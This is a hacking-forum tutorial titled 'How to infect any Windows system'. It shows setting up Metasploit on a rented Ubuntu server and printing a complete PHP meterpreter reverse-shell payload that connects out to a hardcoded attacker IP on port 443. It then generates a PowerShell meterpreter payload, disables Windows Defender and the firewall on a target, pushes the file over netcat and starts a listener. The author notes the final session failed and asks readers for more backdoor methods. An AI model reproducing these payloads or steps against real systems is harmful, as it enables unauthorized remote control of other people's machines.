How to infect any Windows system

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
I hear from people all the time, "How do you hack into computers and servers?"

Everyone thinks hacking is difficult and there is no way they will be able to learn hacking - really hacking is VERY simple.

Hacking means 100+ different things, today I am going to show you how to gain remote control of a Windows machine in minutes.

WARNING: Do not misuse this information because I am not your lawyer, also not your mom, and this instruction is intended for learning NOT terror.

If you seriously want to start hacking or programming you have to get a VPS server running Ubuntu just signup here for $3.50/month (<<< Just click and sign up). This allows you to run a VPN, web server, test attacks, and so much more that any hacker will have to know or be learning.

1575382306822.png

I highly recommend deploying your VPS to run from New York (NJ), on Ubuntu, and select the $3.50 option as this will be the most value for your money.

Allowing IPv6 is free and having our own private (internal) address is, why not add both by checking boxes?
1575382498627.png

Now just give your server a catchy af name:
1575382588579.png

So now we can have our attack server named infexor and we will now need to get our Ubuntu instance deployed, so just click:
1575382620036.png

Your attack server (an Ubuntu host) is being setup and will be ready within ~a minute.

To save money, we are going to setup our Ubuntu server before deploying a Windows target (fake victim).

Click on your server's name from the list:
1575382738946.png

You need to launch PuTTY on your computer.

Put the IP address of your server into the PuTTY client:
1575382875759.png

Click open and then "Yes", accept the security certificate warning - this should only happen the first time you connect to a new server from a given system.

Copy over "root" for the username, then paste your password in by copying it, right clicking into the terminal (password looks invisible), simply press enter.

Let's get our system updated!

Code:
apt update
apt upgrade -y
#Great, we are ready to continue.

This may take ~a minute!

Let's get Docker w/ Metasploit now:
Code:
apt install docker.io -y
docker pull metasploitframework/metasploit-framework

Let's launch our Docker image:
Code:
docker run --rm -it -p 80:80 -p 443:443 -p 445:445 -p 4444:4444 -p 8080:8080 metasploitframework/metasploit-framework

This is going to listen on the -p (ports) between the host system and container. Then we will be interactive with the console!

Let's try something basic:
Code:
use payload/php/meterpreter/reverse_tcp
show options
generate -f raw

We now should see an IP address (LHOST) was generated into raw output (PHP).

Let's change this to match our own server!
Code:
set lhost 108.61.72.20
set lport 443

There we go, check out the generated payload:
Code:
/*<?php /**/ error_reporting(0); $ip = '108.61.72.20'; $port = 443; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Now for simplicity, we are going to generate a Windows-focused payload, so how about we attack with PowerShell?
Many times you will hear "Meterpreter", because this is a rather advanced shell used by attackers - so how about we try gaining a Meterpreter session, eh? Yes!
Code:
use payload/windows/meterpreter/reverse_tcp
show options

We will notice
1575397800489.png

How about we set our lhost to our (YOURS NOT MINE BELOW) IP address of our attack VPS we are using and the port 443 for a little more stealth - normally HTTPS traffic. Blend in guys!
Code:
set lhost 108.61.72.20
set lport 443

How about we generate this as a simple PowerShell script?
Code:
cd /tmp
generate -f powershell -o /tmp/rip.ps1

Now that we have our test.ps1 file ready for execution on a Windows machine, how about we launch a quick Windows target to test on..

1575398764243.png
Chicago
Windows 2016 x64
80 GB at $40/mo (do not worry, we will only run this for about an hour or two while practicing with Metasploit).. then destroy it for about $0.12 - about a dime (USD).

1575398928445.png

I am calling this server 'infexed', to match 'infexor'.

At this point we are going to launch Remote Desktop and remote into our Windows host, just hit Windows Key, search for "Remote Desktop Connection" - open.

Enter your infexed server IP when Windows finishes installing on your new VPS. Keep in mind Windows installs can take anywhere from 15 minutes up to 20 minutes (maybe even more), depends on server availability. My infexed system showed a Vultr terminal at 6 minutes in and RDP (Remote Desktop Protocol) showed open after a reboot, this was exactly 9 minutes in.

Once you remote into infexed using your Administrator (username), and password via Remote Desktop you should open the Server Manager tool.

Click "Local Server" on the left.

Now click "On" next to IE Enhanced Security Configuration. For Administrators, turn this to off! Launch Internet Explorer.

Open Windows Defender settings and turn Real-time protection to off.

Browse to https://github.com/diegocr/netcat/raw/master/nc.exe and save this to C:\Windows as nc.exe

On infexor, make sure to open your Windows Firewall with Advanced Security. At the top left, right click "Windows Firewall with Adv..." and click Properties.
Under domain profile, change Firewall state from On to Off.
Under private profile, change Firewall state from On to Off.
Under public profile, change Firewall state from On to Off.
Click Apply at bottom right and OK.

We are going to transfer the file using nc (Netcat), so open cmd.exe (Windows Key + R, cmd.exe)

Enter into infexor command prompt:
Code:
cd %userprofile%\Desktop
nc -l -p 443 > bye.exe

Now on infexor (Ubuntu), we are going to run - keep in mind 8.12.16.152 is my Windows box; infexed and you should use your own:
Code:
cd /tmp
nc -w 3 8.12.16.152 443 < rip.ps1

Now for the most part we will just follow step 3 of this.

Run this on infexor, to listen on port 443 for the reverse connection.
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 108.61.72.20
set lport 443
run

...

So at this point, you'd expect to have a working reverse shell session. Seemingly this is not working however the nc (Netcat) connection worked for file transfer.

Long story short.. hacking is "really easy" because the _VAST_ majority of hacking is just this listed above with a little vulnerability hunting and exploit crafting.

Be smart.. do good things.

Shoutout to Kali for adding undercover mode to mask (UI) as Windows 10.

IF ANYONE KNOWS ANY OTHER WAYS TO BACKDOOR/INFECT WINDOWS - PLEASE PLEASE SHARE THEM HERE.
 

Attachments

  • 1575408403013.png
    1575408403013.png
    232.3 KB · Views: 36
Top